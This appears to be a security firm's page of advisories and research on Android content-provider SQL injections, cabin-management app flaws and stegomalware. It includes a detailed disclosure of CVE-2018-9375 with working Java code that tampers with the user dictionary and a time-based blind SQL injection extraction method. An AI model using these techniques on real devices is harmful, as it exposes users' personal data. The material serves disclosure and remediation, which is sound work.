ADVISORIES | January 17, 2020

Android (AOSP) Download Provider SQL Injection in Query Sort Parameter (CVE-2019-2196)

A malicious application with the INTERNET permission granted could retrieve all entries from the Download Provider internal database, bypassing all currently implemented access control mechanisms, by exploiting an SQL injection in the sort parameter (ORDER BY clause) and appending a LIMIT clause, which allows expressions, including subqueries.

The information retrieved from this provider may include potentially sensitive information such as file names, descriptions, titles, paths, URLs (which may contain sensitive parameters in the query strings), cookies, custom HTTP headers, etc., for applications such as Gmail, Google Chrome, the Google Play Store, etc.
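
As a rough illustration of this class of bug (not the actual Download Provider code), the sketch below shows how a sort parameter that is concatenated into a query lets a caller append a LIMIT clause whose expression can contain a subquery. The table and column names, the buildQuery helper, the uid filter, and the idea of reading one bit per query from the number of returned rows are all assumptions made for this example.

```java
// Illustrative only: a naive query builder, not the AOSP implementation.
final class SortInjectionSketch {

    // Hypothetical provider-side helper: the access-control filter lives in the
    // WHERE clause, but the caller-supplied sort order is concatenated as-is.
    static String buildQuery(String accessFilter, String sortOrder) {
        return "SELECT _id, title FROM downloads WHERE (" + accessFilter + ")"
                + " ORDER BY " + sortOrder;
    }

    // Hypothetical attacker-side helper: a valid sort column followed by a LIMIT
    // expression that evaluates to 1 when the condition holds and 0 otherwise.
    static String injectedSort(String condition) {
        return "_id LIMIT (CASE WHEN (" + condition + ") THEN 1 ELSE 0 END)";
    }

    public static void main(String[] args) {
        // The condition can be any SQL expression, including a subquery
        // that is not subject to the WHERE filter of the outer query.
        String condition = "(SELECT COUNT(*) FROM downloads) > 10";
        System.out.println(buildQuery("uid = 10001", injectedSort(condition)));
    }
}
```

Under these assumptions, a caller that owns at least one row would see one row returned when the condition is true and none when it is false.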

ADVISORIES |

Android (AOSP) Download Provider SQL Injection in Query Selection Parameter (CVE-2019-2198)

A malicious application with the INTERNET permission granted could retrieve all entries from the Download Provider internal database, bypassing all currently implemented access control mechanisms by exploiting an SQL injection in the selection clause.

The information retrieved from this provider may include potentially sensitive information such as file names, descriptions, titles, paths, URLs (that may contain sensitive parameters in the query strings), cookies, custom HTTP headers, etc., for applications such as Gmail, Google Chrome, the Google Play Store, etc.

ADVISORIES |

Android (AOSP) TV Provider SQL Injection in Query Projection Parameter (CVE-2019-2211)

A malicious application without any granted permission could retrieve all entries from the TV Provider internal database, bypassing all currently implemented access control mechanisms by exploiting an SQL injection in the projection parameter.

The information retrieved from this provider may include personal and potentially sensitive information about other installed applications and user preferences, habits, and activity, such as available channels and programs, watched programs, recorded programs, and titles in the “watch next” list.

RESEARCH | April 25, 2019

Internet of Planes: Hacking Millionaires’ Jet Cabins

The push to incorporate remote management capabilities into products has swept across a number of industries. A good example of this is the famous Internet of Things (IoT), where modern home devices from crockpots to thermostats can be managed remotely from a tablet or smartphone.

One of the biggest problems associated with this new feature is a lack of security. Unfortunately, nobody is surprised when a new, widespread vulnerability appears in the IoT world.

However, the situation becomes a bit more concerning when similar technologies appear in the aviation sector. Nowadays we can find Cabin Management and In-Flight entertainment systems that can be managed from mobile devices owned by crew members and/or passengers.

The systems I analyzed in the research presented here are deployed in business jets. The discovered vulnerabilities affect passenger and crew devices.

The Cabin Management System is based on a wireless access point installed onboard the aircraft that provides network connectivity from the mobile devices of passengers and crew members to the cabin server. The Android applications (and their iOS equivalents) for both vendors were developed by Rockwell Collins to manage the available cabin capabilities in the aircraft such as cabin temperature, light intensity and much more.

Manufacturer video promo: https://www.youtube.com/watch?v=pRA3AnPU1dE

The Android apps analyzed in this post are:

  1. Venue Cabin Remote by Rockwell Collins – Android Application Version 2.1.12 (Current Version 2.2.2) (https://play.google.com/store/apps/details?id=com.rockwellcollins.venue.cabinremote)
  2. Bombardier Cabin Control – Android Application Version 2.1.12 (Current Version 2.2.1) (https://play.google.com/store/apps/details?id=com.rockwellcollins.venue.cabinremote.bombardier)
Figure 1. Google Play Store: Bombardier Cabin Control developed by Rockwell Collins
Figure 2. Google Play Store: Venue Cabin Remote developed by Rockwell Collins

The purpose of this post is to:

  • Provide an overview of the operations of these emergent systems, with a focus on the vulnerabilities that affect the Android mobile apps
  • Provide a detailed explanation of how to exploit them

The main vulnerabilities I’ve discovered in the systems are:

  • ZIP Files: Path traversal / Arbitrary File Write
  • Lack of Legitimacy Checking of the Server
    • Rockwell Collins Venue Cabin Remote Version 2.2.2 – Legit Connectivity AP Emulation https://youtu.be/8QRAlTBOatU
    • Unencrypted Communications

Based on the vulnerabilities found during the research, an attacker could create the following situations:

  • Deploy a rogue aircraft access point and write files to the devices of the connected clients. This could lead to a full compromise of the device.
  • Deploy a rogue aircraft access point and capture the credentials or application secrets that crew members use on the real aircraft access point to reach protected areas of the application.
  • Connect to a real aircraft access point and interact with the cabin devices using the application. If the attacker obtains the password for the protected application menus, this could lead to full access to the cabin capabilities and allow the attacker to create situations of discomfort onboard by raising or lowering the temperature, changing the light intensity, or switching the lights off or making them blink.
  • Connect to a real aircraft access point and multicast a different server configuration to force the devices connected to the network to fetch a new configuration file. This could lead to dangerous situations such as:
    • A full compromise of the client devices connected to the network.
    • Situations of discomfort onboard the aircraft caused by raising or lowering the temperature, changing the light intensity, or switching the lights off or making them blink.

Research Timeline:

  • 2018 February: IOActive discovers vulnerability
  • 2018 February: IOActive notifies vendor
  • 2019 April: IOActive advisory published

Dani Martinez – @dan1t0 (https://twitter.com/dan1t0)
Security Consultant

The complete research, including a full systems overview and analysis, the vulnerabilities discovered in the Android apps, and detailed exploit scenarios, can be found in the Technical Advisory Paper.

ADVISORIES | August 2, 2018

Android (AOSP) User Dictionary Content Provider Authorization Bypass

A vulnerability was discovered in the Android Open Source Project (AOSP) that allows a malicious application without any permission to access the user's personal dictionary.

RESEARCH |

Discovering and Exploiting a Vulnerability in Android’s Personal Dictionary (CVE-2018-9375)

I was auditing an Android smartphone, and all installed applications were in scope. My preferred approach, when time permits, is to manually inspect as much code as I can. This is how I found a subtle vulnerability that allowed me to interact with a content provider that was supposed to be protected in recent versions of Android: the user’s personal dictionary, which stores the spelling for non-standard words that the user wants to keep.

While in theory access to the user’s personal dictionary should be only granted to privileged accounts, authorized Input Method Editors (IMEs), and spell checkers, there was a way to bypass some of these restrictions, allowing a malicious application to update, delete, or even retrieve all the dictionary’s contents without requiring any permission or user interaction.

This moderate-risk vulnerability, classified as elevation of privilege and fixed in June 2018, affects the following versions of Android: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.

User’s Personal Dictionary
Android provides a custom dictionary that can be customized manually or automatically, learning from the user’s typing. This dictionary can usually be accessed from “Settings → Language & keyboard → Personal dictionary” (sometimes under “Advanced” or slightly different options). It may contain sensitive information, such as names, addresses, phone numbers, emails, passwords, commercial brands, unusual words (which may include illnesses, medicines, technical jargon, etc.), or even credit card numbers.

Figure: Android custom personal dictionary

A user can also define a shortcut for each word or sentence, so instead of typing your full home address, you can add an entry and simply write the associated shortcut (e.g. “myhome”) for its autocompletion.

Figure: Defining a personal dictionary shortcut

Internally, the words are stored in a SQLite database which simply contains a table named “words” (apart from the “android_metadata”). This table’s structure has six columns:

  • _id (INTEGER, PRIMARY KEY)
  • word (TEXT)
  • frequency (INTEGER)
  • locale (TEXT)
  • appid (INTEGER)
  • shortcut (TEXT)

Our main interest will be focused on the “word” column, as it contains the custom words, as its name suggests; however, all remaining columns and tables in the same database would be accessible as well.

Technical Details of the Vulnerability
In older versions of Android, read and write access to the personal dictionary was protected by the following permissions, respectively:

  • android.permission.READ_USER_DICTIONARY
  • android.permission.WRITE_USER_DICTIONARY

This is no longer true for newer versions. According to the official documentation [1]: “Starting on API 23, the user dictionary is only accessible through IME and spellchecker”. The previous permissions were replaced by internal checks so, theoretically, only privileged accounts (such as root and system), the enabled IMEs, and spell checkers could access the personal dictionary content provider (content://user_dictionary/words).

We can check the AOSP code repository and see how, in one of the changes [2], a new private function named canCallerAccessUserDictionary was introduced and invoked from all the standard query, insert, update, and delete functions in the UserDictionary content provider to prevent unauthorized calls to these functions.

While the change seems to be effective for both query and insert functions, the authorization check happens too late in update and delete, introducing a security vulnerability that allows any application to successfully invoke the affected functions via the exposed content provider, therefore bypassing the misplaced authorization check.

In the following code for the UserDictionaryProvider class [3], note how the authorization check (canCallerAccessUserDictionary) is only performed after the calls to db.delete and db.update have already altered the database:

@Override
public int delete(Uri uri, String where, String[] whereArgs) {
   SQLiteDatabase db = mOpenHelper.getWritableDatabase();
   int count;
   switch (sUriMatcher.match(uri)) {
      case WORDS:
          count = db.delete(USERDICT_TABLE_NAME, where, whereArgs);
          break;
 
      case WORD_ID:
          String wordId = uri.getPathSegments().get(1);
          count = db.delete(USERDICT_TABLE_NAME, Words._ID + "=" + wordId
               + (!TextUtils.isEmpty(where) ? " AND (" + where + ')' : ""), whereArgs);
          break;
 
       default:
          throw new IllegalArgumentException("Unknown URI " + uri);
   }
 
   // Only the enabled IMEs and spell checkers can access this provider.
   if (!canCallerAccessUserDictionary()) {
       return 0;
   }

   getContext().getContentResolver().notifyChange(uri, null);
   mBackupManager.dataChanged();
   return count;
}


@Override
public int update(Uri uri, ContentValues values, String where, String[] whereArgs) {
   SQLiteDatabase db = mOpenHelper.getWritableDatabase();
   int count;
   switch (sUriMatcher.match(uri)) {
      case WORDS:
         count = db.update(USERDICT_TABLE_NAME, values, where, whereArgs);
         break;

      case WORD_ID:
         String wordId = uri.getPathSegments().get(1);
         count = db.update(USERDICT_TABLE_NAME, values, Words._ID + "=" + wordId
              + (!TextUtils.isEmpty(where) ? " AND (" + where + ')' : ""), whereArgs);
         break;

      default:
         throw new IllegalArgumentException("Unknown URI " + uri);
   }

   // Only the enabled IMEs and spell checkers can access this provider.
   if (!canCallerAccessUserDictionary()) {
      return 0;
   }

   getContext().getContentResolver().notifyChange(uri, null);
   mBackupManager.dataChanged();
   return count;
}

Finally, notice how the AndroidManifest.xml file does not provide any additional protection (e.g. intent filters or permissions) to the explicitly exported content provider:

<manifest xmlns:android="http://schemas.android.com/apk/res/android"
       package="com.android.providers.userdictionary"
       android:sharedUserId="android.uid.shared">

   <application android:process="android.process.acore"
       android:label="@string/app_label"
       android:allowClearUserData="false"
       android:backupAgent="DictionaryBackupAgent"
       android:killAfterRestore="false"
       android:usesCleartextTraffic="false"
       >

       <provider android:name="UserDictionaryProvider"
          android:authorities="user_dictionary"
          android:syncable="false"
          android:multiprocess="false"
          android:exported="true" />

   </application>
</manifest>

It is trivial for an attacker to update the content of the user dictionary by invoking code like the following from any malicious application, without the need to ask for any permission:

ContentValues values = new ContentValues();
values.put(UserDictionary.Words.WORD, "IOActive");

getContentResolver().update(UserDictionary.Words.CONTENT_URI, values,
        null, null);

It would also be trivial to delete any content, including the entire personal dictionary:

getContentResolver().delete(UserDictionary.Words.CONTENT_URI, null, null);

Both methods (update and delete) are supposed to return the number of affected rows, but in this case (for non-legitimate invocations) they will always return zero, making it slightly more difficult for an attacker to extract or infer any information from the content provider.

At this point, it may appear that this is all we can do from an attacker perspective. While deleting or updating arbitrary entries could be a nuisance for the end user, the most interesting part is accessing personal data.

Even if the query function is not directly affected by this vulnerability, it is still possible to dump the entire contents by exploiting a time-based, side-channel attack. Since the where argument is fully controllable by the attacker, and due to the fact that a successful update of any row takes more time to execute than the same statement when it does not affect any row, the attack described below was proven to be effective.

Simple Proof of Concept
Consider the following code fragment running locally from a malicious application:

ContentValues values = new ContentValues();
values.put(UserDictionary.Words._ID, 1);

long t0 = System.nanoTime();
for (int i=0; i<200; i++) {
    getContentResolver().update(UserDictionary.Words.CONTENT_URI, values,
                    "_id = 1 AND word LIKE 'a%'", null);
}
long t1 = System.nanoTime();

When the very same statement is invoked enough times (e.g. 200 times, depending on the device), the time difference (t1-t0) between an SQL condition that evaluates to “true” and one that evaluates to “false” becomes noticeable, allowing the attacker to extract all the information in the affected database by exploiting a classic time-based, Boolean blind SQL injection attack.

Therefore, if the first user-defined word in the dictionary starts with the letter “a”, the condition will be evaluated to “true” and the code fragment above will take more time to execute (for example, say 5 seconds), compared to the lesser time required when the guess is false (e.g. 2 seconds), since no row will actually be updated in that case. If the guess was wrong, we can then try with “b”, “c”, and so on. If the guess is correct, it means that we know the first character of the word, so we can proceed with the second character using the same technique. Then, we can move forward to the next word and so on until we dump the entire dictionary or any filterable subset of rows and fields.
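
The character-by-character guessing described above can be sketched in plain Java as follows. This is a minimal simulation, not the PoC code: the Predicate stands in for the timing measurement (it answers "does the word start with this prefix?"), and the class name, the helper names, and the lowercase-only alphabet are assumptions made for the example.

```java
import java.util.function.Predicate;

final class PrefixGuessSketch {

    // WHERE clause for one guess, in the same shape as the fragment above.
    // The alphabet is assumed to contain no quotes or LIKE wildcards.
    static String whereForPrefix(long id, String prefix) {
        return "_id = " + id + " AND word LIKE '" + prefix + "%'";
    }

    // Extends the known prefix one character at a time until no guess succeeds.
    static String recover(Predicate<String> startsWith, String alphabet, int maxLength) {
        StringBuilder known = new StringBuilder();
        while (known.length() < maxLength) {
            boolean extended = false;
            for (char c : alphabet.toCharArray()) {
                if (startsWith.test(known.toString() + c)) {
                    known.append(c);
                    extended = true;
                    break;
                }
            }
            if (!extended) {
                break; // no candidate matched: the word is complete
            }
        }
        return known.toString();
    }

    public static void main(String[] args) {
        String secret = "ioactive"; // simulated dictionary entry
        Predicate<String> oracle = secret::startsWith; // replaces the timing oracle
        System.out.println(whereForPrefix(1, "a"));
        System.out.println(recover(oracle, "abcdefghijklmnopqrstuvwxyz", 32));
    }
}
```

In a real attack, each call to the oracle would be a timed batch of update invocations using the WHERE clause built by whereForPrefix.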

To avoid altering the database contents, notice how we updated the “_id” column of the retrieved word to match its original value, so the inner idempotent statement will look like the following:

UPDATE words SET _id=N WHERE _id=N AND (condition)

If the condition is true, the row with identifier “N” will be updated in a way that doesn’t actually change its identifier, since it will be set to its original value, leaving the row unmodified. This is a non-intrusive way to extract data using the execution time as a side-channel oracle.

Because we can replace the condition above with any sub-select statement, this attack can be extended to query any SQL expression supported in SQLite, such as:

  • Is the word ‘something’ stored in the dictionary?
  • Retrieve all 16-character words (e.g. credit card numbers)
  • Retrieve all words that have a shortcut
  • Retrieve all words that contain a dot
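
As a sketch of how such questions could be phrased, the helpers below build WHERE clauses of the form “_id=N AND (condition)” for the examples listed above. The class and method names are hypothetical; only the “words” table and its columns come from the schema described earlier. Note that a “retrieve all” question is answered in two stages: first an existence test like these, then character-by-character extraction of each matching row.

```java
final class ConditionSketch {

    // Wraps a Boolean condition so that it only affects the row with the given id.
    static String where(long id, String condition) {
        return "_id = " + id + " AND (" + condition + ")";
    }

    // True if at least one row of the words table satisfies the filter.
    static String exists(String rowFilter) {
        return "EXISTS (SELECT 1 FROM words WHERE " + rowFilter + ")";
    }

    // Is the given word stored in the dictionary? Single quotes are doubled.
    static String wordEquals(String word) {
        return "word = '" + word.replace("'", "''") + "'";
    }

    // Words with exactly n characters (e.g. 16 for card-number-like entries).
    static String wordHasLength(int n) {
        return "length(word) = " + n;
    }

    // Words that have a non-empty shortcut.
    static String hasShortcut() {
        return "shortcut IS NOT NULL AND shortcut <> ''";
    }

    // Words that contain a dot.
    static String containsDot() {
        return "word LIKE '%.%'";
    }

    public static void main(String[] args) {
        System.out.println(where(1, exists(wordEquals("something"))));
        System.out.println(where(1, exists(wordHasLength(16))));
        System.out.println(where(1, exists(hasShortcut())));
        System.out.println(where(1, exists(containsDot())));
    }
}
```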

Real-world Exploitation
The process described above can be fully automated and optimized. I developed a simple Android application to prove its exploitability and test its effectiveness.

The proof-of-concept (PoC) application is based on the assumption that we can blindly update arbitrary rows in the UserDictionary database through the aforementioned content provider. If the inner UPDATE statement affects one or more rows, it will take more time to execute. This is essentially all that we will need in order to infer whether an assumption, in the form of a SQL condition, is evaluated to true or false.

However, since at this initial point we don’t have any information about the content (not even the values of the internal identifiers), instead of iterating through all possible identifier values, we’ll start with the row with the lowest identifier and smash the original value of its “frequency” field to an arbitrary number. This step could be done using different valid approaches.

Because several shared processes will be running at the same time in Android, the total elapsed time for the same invocation will vary between different executions. Also, this execution time will depend on each device’s processing capabilities and performance; however, from a statistical perspective, repeating the same invocation a significant number of times should give us a differentiable measure on average. That’s why we’ll need to adjust the number of iterations per device and current configuration (e.g. while in battery saving mode).

Although I tried with a more complex approach first to determine if a response time should be interpreted as true or false, I ended up implementing a much simpler approach that led to accurate and reliable results. Just repeat the same number of requests that always evaluate to “true” (e.g. “WHERE 1=1”) and “false” (e.g. “WHERE 1=0”) and take the average time as the threshold to differentiate them. Measured times greater than the threshold will be interpreted as true; otherwise, as false. It’s not AI or big data, nor does it use blockchain or the cloud, but the K.I.S.S. principle applies and works!
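
A minimal sketch of this thresholding idea, assuming the timings have already been collected into arrays (the class and method names are mine, not the PoC’s):

```java
final class ThresholdSketch {

    // Arithmetic mean of a set of measured times.
    static double mean(long[] samples) {
        double sum = 0;
        for (long s : samples) {
            sum += s;
        }
        return sum / samples.length;
    }

    // With the same number of "true" and "false" samples, the overall average
    // is the midpoint between the two group means.
    static double threshold(long[] trueTimes, long[] falseTimes) {
        return (mean(trueTimes) + mean(falseTimes)) / 2.0;
    }

    // Times above the threshold are read as "true", the rest as "false".
    static boolean interpret(long elapsed, double threshold) {
        return elapsed > threshold;
    }

    public static void main(String[] args) {
        long[] trueTimes = {5000, 5200, 4800};  // e.g. WHERE 1=1, in milliseconds
        long[] falseTimes = {2000, 2100, 1900}; // e.g. WHERE 1=0, in milliseconds
        double t = threshold(trueTimes, falseTimes);
        System.out.println(t + " " + interpret(4000, t) + " " + interpret(3000, t));
    }
}
```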

Figure: Differentiating correct and wrong assumptions

Once we have a way to differentiate between correct and wrong assumptions, it becomes trivial to dump the entire database. The example described in the previous section is easy to understand, but it isn’t the most efficient way to extract information in general. In our PoC, we’ll use the binary search algorithm [4] instead for any numeric query, using the following simple approach:

  • Determine the number of rows of the table (optional)
    • SELECT COUNT(*) FROM words
  • Determine the lowest identifier
    • SELECT MIN(_id) FROM words
  • Determine the number of characters of the word with that identifier
    • SELECT length(word) FROM words WHERE _id=N
  • Iterate through that word, extracting character by character (in ASCII/Unicode)
    • SELECT unicode(substr(word, i, 1)) FROM words WHERE _id=N
  • Determine the lowest identifier which is greater than the one we got and repeat
    • SELECT MIN(_id) FROM words WHERE _id > N

Remember that we can’t retrieve any numeric or string value directly, so we’ll need to translate these expressions into a set of Boolean queries that we can evaluate to true or false, based on their execution time. This is how the binary search algorithm works. Instead of querying for a number directly, we’ll query: “is it greater than X?” repeatedly, adjusting the value of X in each iteration until we find the correct value after log(n) queries. For instance, if the current value to retrieve is 97, an execution trace of the algorithm will look like the following:

Iteration  Condition      Result  Max  Min  Mid
(start)                           255    0  127
1          Is N > 127?    No      127    0   63
2          Is N > 63?     Yes     127   63   95
3          Is N > 95?     Yes     127   95  111
4          Is N > 111?    No      111   95  103
5          Is N > 103?    No      103   95   99
6          Is N > 99?     No       99   95   97
7          Is N > 97?     No       97   95   96
8          Is N > 96?     Yes      97   96   96
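
The search traced above can be sketched as follows. This is a simulation under stated assumptions rather than the PoC code: the IntPredicate stands in for the timed “is it greater than X?” query, the class and method names are hypothetical, and the lower bound starts at -1 (instead of 0) so that the value 0 can also be found.

```java
import java.util.function.IntPredicate;

final class BlindBinarySearch {

    // Turns a numeric subquery into the Boolean condition "is it greater than x?".
    static String greaterThan(String numericSubquery, int x) {
        return "(" + numericSubquery + ") > " + x;
    }

    // Finds n in [0, max] using only "is n > x?" questions.
    // Invariant: lo < n <= hi.
    static int find(IntPredicate isGreaterThan, int max) {
        int lo = -1;
        int hi = max;
        while (hi - lo > 1) {
            int mid = lo + (hi - lo) / 2;
            if (isGreaterThan.test(mid)) {
                lo = mid; // n > mid
            } else {
                hi = mid; // n <= mid
            }
        }
        return hi;
    }

    public static void main(String[] args) {
        int secret = 97; // simulated character code ('a')
        int[] queries = {0};
        int found = find(x -> { queries[0]++; return secret > x; }, 255);
        System.out.println(found + " found in " + queries[0] + " queries");
        System.out.println(greaterThan(
                "SELECT unicode(substr(word, 1, 1)) FROM words WHERE _id=1", 127));
    }
}
```

For a range of 256 possible values, the loop always asks exactly eight questions, which matches the eight iterations in the trace.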

 

The Proof-of-Concept Exploitation Tool
The process described above was implemented in a PoC tool, shown below. The source code and compiled APK for this PoC can be accessed from the following GitHub repository: https://github.com/IOActive/AOSP-ExploitUserDictionary

Let’s have a look at its minimalistic user interface and explain its peculiarities.

Figure: Proof-of-concept exploitation tool

The first thing the application does is attempt to access the personal dictionary content provider directly, querying the number of entries. Under normal circumstances (not running as root, etc.), we should not have access. If for any reason we achieve direct access, it doesn’t make sense to exploit anything using a time-based, blind approach, but even in that case, you’ll be welcome to waste your CPU cycles with this PoC instead of mining cryptocurrencies.

As described before, there are only two parameters to adjust:

  • Initial number of iterations: How many times the same call will be repeated to get a significant time difference.
  • Minimum time threshold (in milliseconds): How much time will be considered the lowest acceptable value.

Although the current version of the tool will adjust them automatically for us, in the very first stage everything was manual and the tool was simply taking these parameters as they were provided, so this is one of the reasons why these controls exist.

In theory, the larger these numbers are, the better accuracy we’ll get, but the extraction will be slower. If they are smaller, it will run faster, but inaccurate results become more likely. This is why there is a hardcoded minimum of 10 iterations and 200 milliseconds.

If we press the “START” button, the application will start the auto-adjustment of the parameters. First, it will run some queries and discard the results, as the initial ones were usually quite high and not representative. Then, it will execute the initial number of iterations and estimate the corresponding threshold. If the obtained threshold is above the minimum we configured, then it will test the estimated accuracy by running 20 consecutive queries, alternating true and false statements. If the accuracy is not good enough (only one mistake will be allowed), then it will increase the number of iterations and repeat the process a set number of times until the parameters are properly adjusted or give up and exit if the conditions couldn’t be satisfied.
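
The auto-adjustment loop described above might look roughly like the following sketch. It is not the PoC’s code: the Probe interface (which returns the elapsed time for a batch of always-true or always-false calls), the doubling of the iteration count, and all names are assumptions made for the example.

```java
final class CalibrationSketch {

    // Hypothetical timing source: elapsed milliseconds for `iterations` calls
    // whose condition is always true or always false.
    interface Probe {
        long elapsedMs(boolean condition, int iterations);
    }

    static final int CHECKS = 20;          // alternating true/false test queries
    static final int ALLOWED_MISTAKES = 1; // only one mistake is tolerated

    // Returns the accepted number of iterations, or -1 if calibration gives up.
    static int calibrate(Probe probe, int initialIterations, long minThresholdMs, int maxAttempts) {
        int iterations = initialIterations;
        for (int attempt = 0; attempt < maxAttempts; attempt++) {
            probe.elapsedMs(true, iterations); // warm-up run, result discarded
            double threshold =
                    (probe.elapsedMs(true, iterations) + probe.elapsedMs(false, iterations)) / 2.0;
            if (threshold > minThresholdMs
                    && mistakes(probe, iterations, threshold) <= ALLOWED_MISTAKES) {
                return iterations;
            }
            iterations *= 2; // assumption: the growth strategy is not specified
        }
        return -1;
    }

    // Counts how many of the alternating test queries are misclassified.
    static int mistakes(Probe probe, int iterations, double threshold) {
        int wrong = 0;
        for (int i = 0; i < CHECKS; i++) {
            boolean expected = (i % 2 == 0);
            boolean inferred = probe.elapsedMs(expected, iterations) > threshold;
            if (inferred != expected) {
                wrong++;
            }
        }
        return wrong;
    }

    public static void main(String[] args) {
        // Simulated device: true statements cost 3 ms per call, false ones 1 ms.
        Probe simulated = (condition, n) -> condition ? 3L * n : 1L * n;
        System.out.println(calibrate(simulated, 10, 200, 8));
    }
}
```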

Once the process is started, some controls will be disabled, and we’ll see the current verbose output in the scrollable log window below (also via logcat) where we can see, among other messages, the current row identifier, all SQL subqueries, the total time, and the inferred trueness. The retrieved characters will appear in the upper line as soon as they’re extracted.

Figure: Verbose output of the scrollable log window

Finally, the “UPD” and “DEL” buttons on the right are completely unrelated to the time-based extraction controls, and they simply implement direct calls to the content provider to perform an UPDATE and DELETE, respectively. They were intentionally limited to affect the words starting with “123” only. This was done to avoid accidental deletions of any personal dictionary, so in order to test these methods, we’ll need to add this entry manually, unless we had it already.

Demo
Probably the easiest way to summarize the process is to watch the tool in action in the following videos, recorded on a real device.

Additional Considerations
There is usually a gap between theory and practice, so I’d also like to share some of the issues I faced during the design and development of this PoC. First, bear in mind that the tool is simply a quick and dirty PoC. Its main goal was to prove that the exploitation was possible and straightforward to implement, and that’s why it has several limitations and doesn’t follow many of the recommended programming best practices, as it’s not meant to be maintainable, efficient, offer a good user experience, etc.

In the initial stages, I didn’t care about the UI and everything was dumped to the Android log output. When I decided to show the results in the GUI as well, I had to run all the code in a separate thread to avoid blocking the UI thread (which may cause the app to be considered unresponsive and therefore killed by the OS). The accuracy dropped considerably with this simple change, because that thread didn’t have much priority, so I set it to “-20”, which is the maximum allowed priority, and everything worked fine again.

Updating the UI from a separate thread may lead to crashes and it’s generally detected and restricted via runtime exceptions, so in order to show the log messages, I had to invoke them using calls to runOnUiThread. Bear in mind that in a real exploit, there’s no need for a UI at all.

If the personal dictionary is empty, we can’t use any row to force an update, and therefore all queries will take more or less the same time to execute. In this case there’ll be nothing to extract and the tool shouldn’t be able to adjust the parameters and will eventually stop. In some odd cases, it might be randomly calibrated even with an empty database and it will try to extract garbage or pseudo-random data.

On a regular smartphone, the OS will go into sleep mode after a while and the performance will drop considerably, causing the execution time to increase way above the expected values, so all calls would be evaluated as true. This could have been detected and handled differently, but I opted for a simpler solution: I kept the screen turned on and acquired a wake lock via the power manager to prevent the OS from suspending the app. I didn’t bother to release it afterwards, so you’ll have to kill the application if you’re not using it.

Rotating the screen also caused problems, so I forced it to landscape mode only to avoid auto-rotating and to take advantage of the extra width to show each message in a single line.

Once you press the “START” button, some controls will be permanently disabled. If you want to readjust the parameters or run it multiple times, you’ll need to close it and reopen it.

Some external events and executions in parallel (e.g. synchronizing the email, or receiving a push message) may interfere with the application’s behavior, potentially leading to inaccurate results. If that happens, try it again in more stable conditions, such as disabling access to the network or closing all other applications.

The UI doesn’t support internationalization, and it wasn’t designed to extract words in Unicode (although it should be trivial to adapt, it wasn’t my goal for a simple PoC).

It was intentionally limited to extract the first 5 words only, sorted by their internal identifiers.

Remediation
From a source code perspective, the fix is very simple. Just moving the call to check if the caller has permissions to the beginning of the affected functions should be enough to fix the issue. Along with the advisory, we provided Google a patch file with the suggested fix and this was the commit in which they fixed the vulnerability:
https://android.googlesource.com/platform/packages/…
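
To illustrate why the position of the check matters, here is a minimal plain-Java model of the two orderings. It is not the AOSP patch: the in-memory list replaces the SQLite table, the boolean field replaces canCallerAccessUserDictionary, and all names are hypothetical.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

final class DictionaryProviderSketch {
    private final List<String> words = new ArrayList<>();
    private final boolean callerAuthorized; // stands in for canCallerAccessUserDictionary()

    DictionaryProviderSketch(boolean callerAuthorized, String... initialWords) {
        this.callerAuthorized = callerAuthorized;
        words.addAll(Arrays.asList(initialWords));
    }

    // Vulnerable ordering: the data is modified before the check runs,
    // so an unauthorized caller gets 0 back but the rows are already gone.
    int deleteAllVulnerable() {
        int count = words.size();
        words.clear();
        if (!callerAuthorized) {
            return 0;
        }
        return count;
    }

    // Fixed ordering: the check runs first and nothing is touched on failure.
    int deleteAllFixed() {
        if (!callerAuthorized) {
            return 0;
        }
        int count = words.size();
        words.clear();
        return count;
    }

    int size() {
        return words.size();
    }

    public static void main(String[] args) {
        DictionaryProviderSketch vulnerable = new DictionaryProviderSketch(false, "alpha", "beta");
        DictionaryProviderSketch fixed = new DictionaryProviderSketch(false, "alpha", "beta");
        System.out.println(vulnerable.deleteAllVulnerable() + " returned, " + vulnerable.size() + " left");
        System.out.println(fixed.deleteAllFixed() + " returned, " + fixed.size() + " left");
    }
}
```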

Since the issue has been fixed in the official repository, as end users, we’ll have to make sure that our current installed security patch level contains the patch for CVE-2018-9375. For instance, in Google Pixel/Nexus, it was released in June 2018:
https://source.android.com/security/bulletin/pixel/2018-06-01

If for any reason it’s not possible to apply an update to your device, consider reviewing the contents of your personal dictionary and make sure it doesn’t contain any sensitive information in the unlikely event the issue becomes actively exploited.

Conclusions
Software development is hard. A single misplaced line may lead to undesirable results. A change that was meant to improve the security and protection of the user’s personal dictionary, making it less accessible, led to the opposite outcome, as it inadvertently allowed access without requiring any specific permission and went unnoticed for almost three years.

Identifying a vulnerability like the one described here can be as easy as reading and understanding the source code, just following the execution flow. Automated tests may help detect this kind of issue at an early stage and prevent them from happening again in further changes, but they aren’t always that easy to implement and maintain.

We also learned how to get the most from a vulnerability that, in principle, only allowed us to destroy or tamper with data blindly, increasing its final impact to an information disclosure that leaked all the data by exploiting a side-channel, time-based attack.

Always think outside the box, and remember: time is one of the most valuable resources. Every nanosecond counts!

RESEARCH | September 22, 2015

Is Stegomalware in Google Play a Real Threat?

For several decades, the science of steganography has been used to hide malicious code (useful in intrusions) or to create covert channels (useful in information leakage). Nowadays, steganography can be applied to almost any logical/physical medium (file formats, images, audio, video, text, protocols, programming languages, file systems, BIOS, etc.). If the steganographic algorithms are well designed, the hidden information is really difficult to detect. Detecting hidden information, malicious or not, is so complex that the study of steganalytic (detection) algorithms has been growing. You can see the growth in scientific publications (source: Google Scholar) and in research investment by governments and institutions.
In fact, since the attacks on September 11, 2001, there has been a lot of discussion on the possibility of terrorists using this technology. See:
 
 
 
 
In this post, I would like to illustrate steganography’s ability to hide data in Android applications. In this experiment, I focus on Android applications published in Google Play, leaving aside alternative markets with lower security measures, where it is easier to introduce malicious code.
 
 
Is it possible to hide information on Google Play or in the Android apps released in it?
 
The answer is easy: YES! Simple techniques have been documented, from hiding malware by renaming the file extension (Android / tr DroidCoupon.A – 2011, Android / tr SmsZombie.A – 2012, Android / tr Gamex.A – 2013) to more sophisticated procedures (AngeCryption – Black Hat Europe, October 2014).
 
Let me show some examples in more depth:
 
 
Google Play Web (https://play.google.com)
 
Google Play includes a webpage for each app with information such as a title, images, and a text description. Each piece of information could conceal data using steganography (linguistic steganography, image steganography, etc.). In fact, I am going to “work” with digital images and demonstrate how Google “works” when there is hidden information inside of files.
 
